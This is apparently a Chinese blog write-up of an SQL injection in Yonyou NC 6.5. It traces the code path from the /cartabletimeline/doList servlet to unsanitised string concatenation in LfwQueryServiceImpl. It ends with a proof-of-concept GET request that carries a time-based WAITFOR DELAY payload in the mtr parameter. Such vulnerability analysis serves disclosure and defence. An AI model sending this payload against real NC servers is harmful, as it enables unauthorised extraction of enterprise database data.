cartabletimeline存在SQL注入

漏洞描述
用友NC是一款大型erp企业管理系统与电子商务平台。用友网络科技股份有限公司用友NC存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

影响版本
用友NC6.5

漏洞分析
VsmAction类中此处存在@Servlet注解,也就是说当访问路径为/cartabletimeline会直接定位到这里。

在这里插入图片描述
在doList方法上面标注了@Action标签,当我们请求/cartabletimeline/doList的时候就会进入该doList方法。

继续看doList方法的详细代码 在这里插入图片描述
这里接收了一个参数为mtr,并且传入getVehicleApplyInfo函数来执行,传入时将sb变量转为字符串类型。

getVehicleApplyInfo函数是carTalbeService对象进行调用的,而carTalbeService对象是通过ICarTalbeService接口来进行实例化。

进入ICarTalbeService接口

在这里插入图片描述
追踪ICarTalbeService接口的实现类
定位到PsndocServiceImpl类

在这里插入图片描述
观察getVehicleApplyInfo具体实现内容 在这里插入图片描述
传入参数后调用了getCarTableQueryService().getgetUserVehicleApplyInfo

查看getCarTableQueryService内容 在这里插入图片描述
这里返回的是一个carTableQueryService类型的对象,那么去看carTableQueryService类中的getgetUserVehicleApplyInfo方法 在这里插入图片描述
跟踪queryVOs,定位到CRUDHelper类
在这里插入图片描述
类方法getCRUDService() 根据传入的类名AggVOCrudServiceImpl去加载并返回一个 ILfwCRUDService 类型的实例

定位到ILfwCRUDService类 在这里插入图片描述
查看queryVOs函数内容 在这里插入图片描述
通过服务定位器ServiceLocator来获取一个实现了 ILfwQueryService 接口的服务实例

定位到ILfwQueryService实现类LfwQueryServiceImpl
参数wherePart不为空,且不以"where"字符结尾,则拼接进sql语句 在这里插入图片描述
在这里插入图片描述
至此代码分析结束

漏洞POC
GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:2%27–+ HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=4
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值